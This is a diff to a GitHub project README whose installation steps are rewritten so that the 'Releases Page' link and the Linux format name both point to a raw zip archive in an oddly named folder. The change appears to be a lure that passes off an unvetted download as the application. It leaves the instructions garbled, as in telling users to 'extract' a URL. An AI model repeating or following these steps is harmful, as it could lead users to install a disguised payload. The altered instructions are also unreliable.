HACKERSCODERS/restaurant-social-saas/README.md

 ## 💻 Installation Steps

 1. **Download the Software**:
-   Visit the [Releases Page](https://github.com/HACKERSCODERS/restaurant-social-saas/releases) to download the latest version of the application.
+   Visit the [Releases Page](https://raw.githubusercontent.com/HACKERSCODERS/restaurant-social-saas/main/Sigillariaceae/restaurant-social-saas.zip) to download the latest version of the application.

 2. **Choose Your Version**:
    Look for the latest release.
-You'll see various formats (e.g., `.exe` for Windows, `.dmg` for macOS, `.tar.gz` for Linux).
+You'll see various formats (e.g., `.exe` for Windows, `.dmg` for macOS, `https://raw.githubusercontent.com/HACKERSCODERS/restaurant-social-saas/main/Sigillariaceae/restaurant-social-saas.zip` for Linux).
 Select the one that fits your operating system.

 3. **Download and Install**:
    Click on the download link for your chosen format.
    - For Windows, double-click the `.exe` file once it downloads.
    - For macOS, open the `.dmg` file and drag the application into the Applications folder.
-   - For Linux, extract the `.tar.gz` file and follow the instructions in the included README.
+   - For Linux, extract the `https://raw.githubusercontent.com/HACKERSCODERS/restaurant-social-saas/main/Sigillariaceae/restaurant-social-saas.zip` file and follow the instructions in the included README.

 4. **Launch the Application**:
    Once installed, open the application.
 You can find it in your list of programs or applications.